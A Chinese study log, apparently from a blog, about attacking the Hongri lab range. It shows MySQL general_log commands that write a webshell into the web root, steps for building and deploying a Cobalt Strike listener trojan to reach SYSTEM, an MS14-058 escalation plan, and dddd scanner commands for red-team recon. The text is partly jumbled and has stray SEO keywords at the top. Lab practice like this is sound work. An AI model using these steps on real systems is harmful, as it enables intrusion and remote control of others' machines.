做一个直播app软件要多少钱,西安seo公司,自己做网站开网店,张家界互联网公司有哪几家8月6日
红日靶场打靶继续
SHOW VARIABLES #用于显示服务器运行时的各种系统变量的当前设置。这些变量可以控制服务器的行为在 MySQL 中#xff0c;general_log 和 general_log_file 是两个与“general”相关的系统变量#xff0c;它们控制着服务器是否启用一般查询日志以及…8月6日
红日靶场打靶继续
SHOW VARIABLES #用于显示服务器运行时的各种系统变量的当前设置。这些变量可以控制服务器的行为在 MySQL 中general_log 和 general_log_file 是两个与“general”相关的系统变量它们控制着服务器是否启用一般查询日志以及日志文件的名称。 general_log_file中包含日志存储路径。
SET GLOBAL general_logon; #开启日志读写功能
show variables like %general%; #查找日志相关配置
set global general_log_file C:\\phpStudy\\WWW\\shell.php ; #设置日志存储位置。cs搭建与木马生成
-----文件结构
..|cs
.....|Server
.....|Client
--------------
进入Server
chmod x teamserver
chmod x TeamServerImage
------为两个文件赋予权限
vim teamserver #去这个里面修改端口
bash teamserver 《kali ip》 kali的密码
---------------
进入Client
bash cobaltstrike-client.cmd
进入UI界面host和port分别按照kali ip和自己修改的端口号填写password就是kali密码其他随便填。
使用过程采用攻击红日靶场的。 大致样子。点击cobalt strike选listeners选择监听器。add添加。 http host点击旁边的直接添加。端口自己改不要冲突就行了。save之后选择payload中的可执行程序。创建监听器木马。 木马上传到我们要攻击的主机。 蚁剑运行。 监听成功。 表示当前用户是 “nt authority\system”这是 Windows 系统中的一个内置账户拥有管理员级别的权限。
shell systeminfo #查看系统信息如果不是system的管理员权限的话 只打了四个补丁利用ms14_058提权。采用的cs的插件。 (待明天下载cs插件有更多的功能施展)
dddd工具的使用
最简使用 扫描IP
dddd -t 192.168.0.1扫描网段
dddd -t 192.168.0.1/24dddd -t 192.168.0.0-192.168.0.12扫描网站
dddd -t http://test.com输出文件 dddd存在三种文件输出
txt格式输出默认选择 html格式默认选择 审计日志可选 所有结果默认输出在 result.txt可通过-o参数更改输出文件-ot参数更改输出格式(json)默认为text。
默认HTML格式漏洞输出为 当前时间戳.html可通过-ho参数更改输出文件。
-a 参数开启审计日志功能日志保存在 audit.log记录详细扫描行为。
扫描可以随时终止当有指纹识别、漏扫结果等输出时会实时保存在文件内。
应用场景命令速查 红队外网 (Hunter)
dddd -t icp.namexxxx有限公司 -hunter -oip红队外网 (Hunter查询备案,Fofa补充端口高效梳理资产
dddd -t icp.namexxxx有限公司 -hunter -fofa -oip红队外网 (本机枚举子域名)
dddd -t xxx.com -sd红队内网
./dddd -t 172.16.100.0/24安服测试/敏感环境 (开启审计日志便于事后甩锅)
./dddd -t 172.16.100.1 -a仅指纹识别
./dddd -t http://www.xxx.com -npoc
./dddd -t 172.16.100.11 -npoc
./dddd -t 172.16.120.11:3307 -npocd -t 172.16.100.1 -a 仅指纹识别
./dddd -t http://www.xxx.com -npoc ./dddd -t 172.16.100.11 -npoc ./dddd -t 172.16.120.11:3307 -npoc
